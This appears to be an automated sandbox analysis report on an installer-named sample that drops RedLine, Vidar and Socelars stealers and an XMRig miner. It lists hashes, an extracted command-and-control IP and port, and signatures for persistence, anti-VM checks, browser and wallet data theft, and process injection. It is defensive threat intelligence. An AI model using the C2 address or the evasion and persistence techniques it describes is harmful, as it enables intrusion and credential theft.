Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Analysis
-
max time kernel
407s -
max time network
436s -
platform
windows11_x64 -
resource
win11 -
submitted
07-09-2021 17:58
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-jp
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-fr
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win7-de
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral10
Sample
setup_x86_x64_install.exe
Resource
win10-de
General
-
Target
setup_x86_x64_install.exe
-
Size
2.9MB
-
MD5
3f1f81101d0ce95fdfac97f5913cd662
-
SHA1
8e615a64e4d72b08926242b7d73a608bdd7e9fce
-
SHA256
90aa6a7c770f2c0f49596731c80fda7d044802dea9e905ff999b39cda5428407
-
SHA512
a776c1f8636ef90d294becf8d09a45366463364026837c19e13227c1c5c9a6656b6fa525e0eec5a1a46997b6ef7066e958c02523a7c4538d046f8b2091145285
Malware Config
Extracted
redline
Jayson
95.181.172.207:56915
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5408 4924 rundll32.exe 23 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5164 4924 rundll32.exe 23 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 8 IoCs
resource yara_rule behavioral5/memory/1368-267-0x0000000000000000-mapping.dmp family_redline behavioral5/memory/1368-268-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral5/memory/2356-312-0x0000000000000000-mapping.dmp family_redline behavioral5/memory/5924-384-0x0000000000000000-mapping.dmp family_redline behavioral5/memory/5324-439-0x0000000000000000-mapping.dmp family_redline behavioral5/memory/4032-474-0x0000000000000000-mapping.dmp family_redline behavioral5/memory/4032-495-0x00000000056A0000-0x0000000005CB8000-memory.dmp family_redline behavioral5/memory/1904-524-0x0000000000000000-mapping.dmp family_redline -
Socelars Payload 2 IoCs
resource yara_rule behavioral5/files/0x000100000002b1bb-200.dat family_socelars behavioral5/files/0x000100000002b1bb-186.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 17 IoCs
description pid Process procid_target PID 836 created 1856 836 WerFault.exe 101 PID 1568 created 1420 1568 WerFault.exe 103 PID 4800 created 4992 4800 Chrome 5.exe 99 PID 5636 created 5456 5636 WerFault.exe 128 PID 6112 created 1100 6112 WerFault.exe 105 PID 4868 created 5140 4868 WerFault.exe 130 PID 5436 created 1160 5436 WerFault.exe 120 PID 5764 created 5284 5764 Tue11e4e580f2e8141a3.exe 123 PID 1864 created 3604 1864 WerFault.exe 116 PID 3996 created 5972 3996 WerFault.exe 169 PID 5912 created 6096 5912 WerFault.exe 141 PID 1044 created 5780 1044 WerFault.exe 138 PID 2092 created 5696 2092 WerFault.exe 175 PID 6076 created 4788 6076 WerFault.exe 162 PID 5812 created 2604 5812 WerFault.exe 288 PID 1848 created 4208 1848 WerFault.exe 300 PID 1608 created 1680 1608 WerFault.exe 323 -
resource yara_rule behavioral5/files/0x000100000002b1bf-178.dat redline behavioral5/files/0x000100000002b1bf-191.dat redline behavioral5/files/0x000100000002b1bf-271.dat redline behavioral5/files/0x000100000002b1bf-316.dat redline -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral5/memory/4992-257-0x0000000004900000-0x00000000049D1000-memory.dmp family_vidar behavioral5/memory/1160-389-0x0000000004940000-0x0000000004A11000-memory.dmp family_vidar -
XMRig Miner Payload 2 IoCs
resource yara_rule behavioral5/memory/3428-704-0x0000000140000000-0x0000000140763000-memory.dmp xmrig behavioral5/memory/1380-729-0x00000000056E0000-0x0000000005CF8000-memory.dmp xmrig -
resource yara_rule behavioral5/files/0x000100000002b1b5-162.dat aspack_v212_v242 behavioral5/files/0x000100000002b1b5-161.dat aspack_v212_v242 behavioral5/files/0x000100000002b1b2-158.dat aspack_v212_v242 behavioral5/files/0x000100000002b1b2-157.dat aspack_v212_v242 behavioral5/files/0x000100000002b1b3-156.dat aspack_v212_v242 behavioral5/files/0x000100000002b1b2-155.dat aspack_v212_v242 behavioral5/files/0x000100000002b1b3-154.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts 46807GHF____.exe -
Executes dropped EXE 64 IoCs
pid Process 4784 setup_installer.exe 3728 setup_install.exe 3232 Tue11e4e580f2e8141a3.exe 772 Tue11d7385a978cc.exe 1148 Tue11b9d76a96506.exe 1100 Tue118f55232e4.exe 1420 Tue1109eec571ac.exe 1560 Tue11f251db82fb7b.exe 1856 Tue11bc0507b56295.exe 5016 Tue11b9d76a96506.tmp 2560 Tue11141271fbe5877f.exe 4992 Tue112c483dd3245d.exe 2164 46807GHF____.exe 5072 LzmwAqmV.exe 3604 6011808.exe 3136 2508132.exe 4800 Chrome 5.exe 1368 Tue11e4e580f2e8141a3.exe 3968 PublicDwlBrowser1100.exe 1160 Alfanewfile2.exe 5140 2.exe 5200 5895651.exe 5284 setup.exe 2356 Tue11e4e580f2e8141a3.exe 5388 setup_2.exe 5532 setup_2.tmp 5504 3002.exe 5608 setup_2.exe 5628 8507044.exe 5768 WinHoster.exe 5780 2586827.exe 5728 jhuuee.exe 5748 setup_2.tmp 5440 Tue11e4e580f2e8141a3.exe 6000 BearVpn 3.exe 6096 5495096.exe 1896 5024180.exe 5924 Tue11e4e580f2e8141a3.exe 4576 3002.exe 5760 postback.exe 5444 1631245.exe 5324 Tue11e4e580f2e8141a3.exe 4332 8802777.exe 4788 4065512.exe 4032 Tue11e4e580f2e8141a3.exe 5764 Tue11e4e580f2e8141a3.exe 1904 Tue11e4e580f2e8141a3.exe 4000 Tue11e4e580f2e8141a3.exe 6052 ultramediaburner.exe 832 ultramediaburner.tmp 988 Jysumopolae.exe 1452 SHyqobaetuno.exe 3252 UltraMediaBurner.exe 5696 Tue11e4e580f2e8141a3.exe 5708 services64.exe 2016 Tue11e4e580f2e8141a3.exe 2540 Tue11e4e580f2e8141a3.exe 3896 Tue11e4e580f2e8141a3.exe 3988 Tue11e4e580f2e8141a3.exe 4292 Tue11e4e580f2e8141a3.exe 5540 Tue11e4e580f2e8141a3.exe 5008 Tue11e4e580f2e8141a3.exe 4576 Tue11e4e580f2e8141a3.exe 5436 Tue11e4e580f2e8141a3.exe -
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5895651.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8507044.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8507044.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1631245.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1631245.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8802777.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8802777.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5895651.exe -
Loads dropped DLL 11 IoCs
pid Process 3728 setup_install.exe 3728 setup_install.exe 3728 setup_install.exe 3728 setup_install.exe 3728 setup_install.exe 3728 setup_install.exe 5016 Tue11b9d76a96506.tmp 5456 rundll32.exe 5532 setup_2.tmp 5748 setup_2.tmp 5972 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral5/files/0x000900000002b1ca-305.dat themida behavioral5/files/0x000900000002b1ca-313.dat themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 2508132.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\FarLabUninstaller\\Cuxaxaquso.exe\"" 46807GHF____.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8802777.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5895651.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8507044.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1631245.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 5200 5895651.exe 5628 8507044.exe 5444 1631245.exe 4332 8802777.exe -
Suspicious use of SetThreadContext 64 IoCs
description pid Process procid_target PID 3232 set thread context of 1368 3232 Tue11e4e580f2e8141a3.exe 106 PID 3232 set thread context of 2356 3232 Tue11e4e580f2e8141a3.exe 119 PID 3232 set thread context of 5924 3232 Tue11e4e580f2e8141a3.exe 142 PID 3232 set thread context of 5324 3232 Tue11e4e580f2e8141a3.exe 150 PID 3232 set thread context of 4032 3232 Tue11e4e580f2e8141a3.exe 160 PID 3232 set thread context of 1904 3232 Tue11e4e580f2e8141a3.exe 168 PID 3232 set thread context of 5696 3232 Tue11e4e580f2e8141a3.exe 175 PID 3232 set thread context of 5008 3232 Tue11e4e580f2e8141a3.exe 207 PID 3232 set thread context of 4576 3232 Tue11e4e580f2e8141a3.exe 209 PID 3232 set thread context of 5176 3232 Tue11e4e580f2e8141a3.exe 219 PID 5708 set thread context of 3428 5708 services64.exe 225 PID 3232 set thread context of 5500 3232 Tue11e4e580f2e8141a3.exe 224 PID 3232 set thread context of 1380 3232 Tue11e4e580f2e8141a3.exe 226 PID 3232 set thread context of 980 3232 Tue11e4e580f2e8141a3.exe 227 PID 3232 set thread context of 5968 3232 Tue11e4e580f2e8141a3.exe 229 PID 3232 set thread context of 4144 3232 Tue11e4e580f2e8141a3.exe 233 PID 3232 set thread context of 3820 3232 Tue11e4e580f2e8141a3.exe 234 PID 3232 set thread context of 4344 3232 Tue11e4e580f2e8141a3.exe 236 PID 3232 set thread context of 1420 3232 Tue11e4e580f2e8141a3.exe 238 PID 3232 set thread context of 5964 3232 Tue11e4e580f2e8141a3.exe 239 PID 3232 set thread context of 6068 3232 Tue11e4e580f2e8141a3.exe 242 PID 3232 set thread context of 3012 3232 Tue11e4e580f2e8141a3.exe 243 PID 3232 set thread context of 3988 3232 Tue11e4e580f2e8141a3.exe 244 PID 3232 set thread context of 5676 3232 Tue11e4e580f2e8141a3.exe 246 PID 3232 set thread context of 4732 3232 Tue11e4e580f2e8141a3.exe 248 PID 3232 set thread context of 812 3232 Tue11e4e580f2e8141a3.exe 249 PID 3232 set thread context of 3720 3232 Tue11e4e580f2e8141a3.exe 250 PID 3232 set thread context of 1404 3232 Tue11e4e580f2e8141a3.exe 252 PID 3232 set thread context of 3420 3232 Tue11e4e580f2e8141a3.exe 254 PID 3232 set thread context of 3020 3232 Tue11e4e580f2e8141a3.exe 257 PID 3232 set thread context of 1520 3232 Tue11e4e580f2e8141a3.exe 259 PID 3232 set thread context of 5412 3232 Tue11e4e580f2e8141a3.exe 260 PID 3232 set thread context of 5260 3232 Tue11e4e580f2e8141a3.exe 261 PID 3232 set thread context of 2696 3232 Tue11e4e580f2e8141a3.exe 263 PID 3232 set thread context of 2340 3232 Tue11e4e580f2e8141a3.exe 265 PID 3232 set thread context of 3532 3232 Tue11e4e580f2e8141a3.exe 267 PID 3232 set thread context of 3236 3232 Tue11e4e580f2e8141a3.exe 269 PID 3232 set thread context of 768 3232 Tue11e4e580f2e8141a3.exe 270 PID 3232 set thread context of 5580 3232 Tue11e4e580f2e8141a3.exe 274 PID 3232 set thread context of 1948 3232 Tue11e4e580f2e8141a3.exe 276 PID 3232 set thread context of 1732 3232 Tue11e4e580f2e8141a3.exe 277 PID 3232 set thread context of 1424 3232 Tue11e4e580f2e8141a3.exe 280 PID 3232 set thread context of 4932 3232 Tue11e4e580f2e8141a3.exe 281 PID 3232 set thread context of 5920 3232 Tue11e4e580f2e8141a3.exe 282 PID 3232 set thread context of 5624 3232 Tue11e4e580f2e8141a3.exe 283 PID 3232 set thread context of 4872 3232 Tue11e4e580f2e8141a3.exe 286 PID 3232 set thread context of 3156 3232 Tue11e4e580f2e8141a3.exe 287 PID 3232 set thread context of 2604 3232 Tue11e4e580f2e8141a3.exe 288 PID 3232 set thread context of 924 3232 Tue11e4e580f2e8141a3.exe 289 PID 3232 set thread context of 3976 3232 Tue11e4e580f2e8141a3.exe 293 PID 3232 set thread context of 2124 3232 Tue11e4e580f2e8141a3.exe 294 PID 3232 set thread context of 4208 3232 Tue11e4e580f2e8141a3.exe 300 PID 3232 set thread context of 700 3232 Tue11e4e580f2e8141a3.exe 301 PID 3232 set thread context of 1440 3232 Tue11e4e580f2e8141a3.exe 304 PID 3232 set thread context of 3180 3232 Tue11e4e580f2e8141a3.exe 307 PID 3232 set thread context of 1280 3232 Tue11e4e580f2e8141a3.exe 308 PID 3232 set thread context of 5780 3232 Tue11e4e580f2e8141a3.exe 309 PID 3232 set thread context of 2728 3232 Tue11e4e580f2e8141a3.exe 311 PID 3232 set thread context of 4612 3232 Tue11e4e580f2e8141a3.exe 312 PID 3232 set thread context of 5448 3232 Tue11e4e580f2e8141a3.exe 313 PID 3232 set thread context of 1600 3232 Tue11e4e580f2e8141a3.exe 314 PID 3232 set thread context of 1392 3232 Tue11e4e580f2e8141a3.exe 315 PID 3232 set thread context of 4048 3232 Tue11e4e580f2e8141a3.exe 320 PID 3232 set thread context of 4696 3232 Tue11e4e580f2e8141a3.exe 321 -
Drops file in Program Files directory 12 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-TQTLI.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp File created C:\Program Files (x86)\FarLabUninstaller\is-MB63D.tmp setup_2.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\UltraMediaBurner\is-A1B79.tmp ultramediaburner.tmp File created C:\Program Files (x86)\FarLabUninstaller\Cuxaxaquso.exe 46807GHF____.exe File created C:\Program Files (x86)\FarLabUninstaller\Cuxaxaquso.exe.config 46807GHF____.exe File created C:\Program Files\Reference Assemblies\FPGTYEQTNK\ultramediaburner.exe 46807GHF____.exe File created C:\Program Files\Reference Assemblies\FPGTYEQTNK\ultramediaburner.exe.config 46807GHF____.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 17 IoCs
pid pid_target Process procid_target 4004 1420 WerFault.exe 103 3820 1856 WerFault.exe 101 2992 4992 WerFault.exe 99 5800 5456 WerFault.exe 128 5236 1100 WerFault.exe 105 5592 1160 WerFault.exe 120 5364 5140 WerFault.exe 130 5156 5284 WerFault.exe 123 5384 3604 WerFault.exe 116 2444 5972 WerFault.exe 169 2104 6096 WerFault.exe 141 3080 5780 WerFault.exe 138 5344 5696 WerFault.exe 175 2924 4788 WerFault.exe 162 6132 2604 WerFault.exe 288 3708 4208 WerFault.exe 300 1568 1680 WerFault.exe 323 -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3380 schtasks.exe 5632 schtasks.exe -
Enumerates system info in registry 2 TTPs 37 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU svchost.exe -
Modifies data under HKEY_USERS 43 IoCs
